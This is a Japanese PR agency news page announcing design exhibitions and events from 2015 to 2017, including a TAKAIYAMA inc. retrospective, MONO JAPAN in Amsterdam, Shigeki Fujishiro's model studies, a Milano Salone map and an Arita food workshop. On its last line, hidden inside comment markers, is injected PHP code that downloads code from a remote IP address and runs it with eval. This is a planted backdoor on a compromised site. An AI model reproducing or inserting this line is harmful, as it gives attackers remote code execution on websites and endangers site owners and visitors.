デイリープレス

TAKAIYAMA inc. EXHIBITION
3F/B.C.G

news / 2017.08.04

tags: event, exhibition, information

まず空間をとらえる、そうすると枠組みが立ち上がる。
名刺から東京ドームまで(宇宙の可能性もある)、おはようからおやすみまで、
コンニャロウ世の中からまんまんちゃんあん(言いますか?)まで。
うらみはらさでおくべきか、と言ってはみたものの、もはや恨みもなくなった。のかな?
そんなことはない。世の中にはまだまだやるべきことがいっぱい。
ならばデザインにも使命があるはずだ。

今までプロジェクトごとに解き方を考えてやってきたのだけど、
見返してみれば自分達なりのアプローチの法則がぼんやり見えてきた。
Focus/Frame/Function(フォーカス・フレイム・ファンクション)焦点・枠組・機能。
困った時には唱えてみよう、魔法の言葉。(現実だけど、、)
まず空間をとらえる、そうすると枠組みが立ち上がる。

TAKAIYAMA inc.の15年の仕事をご覧いただける機会です。
ぜひお出かけ下さい。

山野英之

read more

MONO JAPAN
Japanese Craft & Design

アムステルダム発、日本のクラフトやデザインプロダクトに特化した展示・即売会「MONO JAPAN - Japanese Craft & Desgin」。
今年もアムステルダムのカルチャー発信の中心、世界中からクリエイターが集うLloyd Hotel(ロイドホテル)全体がMONO JAPANの会場です。

news / 2017.01.16

tags: event, exhibition

会期:2017年2月2日(木) – 2月5日(日)
   3日(金)・4日(土)11:00 – 20:00、5日(日)11:00 – 18:00
   2日(木)はプレス&バイヤーの方のみ
会場:Lloyd Hotel & Coltural Embassy
   (Oostelijke Handelskade 34, 1019 BN Amsterdam)

お問い合わせ:03-6416-3201
        naotakegata@dailypress.org

詳細はプレスリリースをご参照ください。
プレスリリースのダウンロードはこちらより

Studies
Shigeki Fujishiro

Photo: Gottingham

プロダクトデザイナー藤城成貴がこれまでに製作してきた模型の数々を展示します。
彼はデザインのプロセスで模型製作を欠かさず行います。
できるだけ現物に近い模型を作り、かたちや色の確認はもちろんのこと、
具体的なシーンに模型を置き、写真撮影をします。
写し出されたものを見ることで、一旦自分から距離をおき、
あたかも別の誰かがデザインしたものを見ているかのような状況を作る。
この時が、自分のアイデアが本当に意味のあるものなのかと、
冷静に判断ができるタイミングなのだと言います。

news / 2016.12.09

tags: event, exhibition, Naname

会期:2016年12月17日(土) – 12月25日(日)
   11:00 – 19:00 (12月25日は18:00まで)
会場:Naname(東京都目黒区青葉台3-5-33 川邊ハイツ1F デイリープレス内) read more

MILANO SALONE 2016

毎年4月にイタリア ミラノで開催される、Salone Internazionale del Mobile di Milano(ミラノ国際家具見本市)通称、ミラノサローネが、4月12日からスタートします。
私どもデイリープレスがPRを担当する会場のご案内です。

news / 2016.04.08

tags: event, exhibition, Milano Salone

私どもが担当する会場の他、日頃よりお世話になった方々や、日本の企業やクリエイターの方々の展示会場などを地図にまとめております。全ての会場を網羅できておりませんが、現地へ行かれる際、お役立ていただけたらと思います。
下記より、ダウンロード下さい。

PDF版
MILANO SALONE 2016:Fuori Salone Exhibition Map

Google Mapsへのリンクはこちらより

11月15日(日)、有田の大銀杏の木の下で食のワークショップとトークショー開催!
細川亜衣+出野尚子×INDUBITABLY

磁器発祥の地、有田と世界が繋がる企画「A View From Above」。
今回は、熊本を拠点に活動する料理人の細川亜衣さんと、鹿児島を拠点に独自の世界観で空間を表現するINDUBITABLYが、有田の古い町並みの一角にある樹齢1000年の大銀杏の木の下で、一日だけの特別なレストランをオープン。細川さんが考えた有田の食材を使ったレシピを、参加者みんなで作るワークショップを行います。

news / 2015.11.06

tags: 2016/project, event

午後のトークでは、台湾茶を中心とした茶会を行っている出野尚子さんに、有田周辺・嬉野地域の茶葉を使って特別なお茶を入れていただきます。美味しいお茶とお菓子と共に、地元食材の生産者を迎え、細川さん、
デザイナーの柳原照弘さんの3人が、食、ものづくり、そしてそこにある”ストーリー”について語り合います。
ゆったりととても楽しい1日になると思います。ぜひお越しください! read more

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>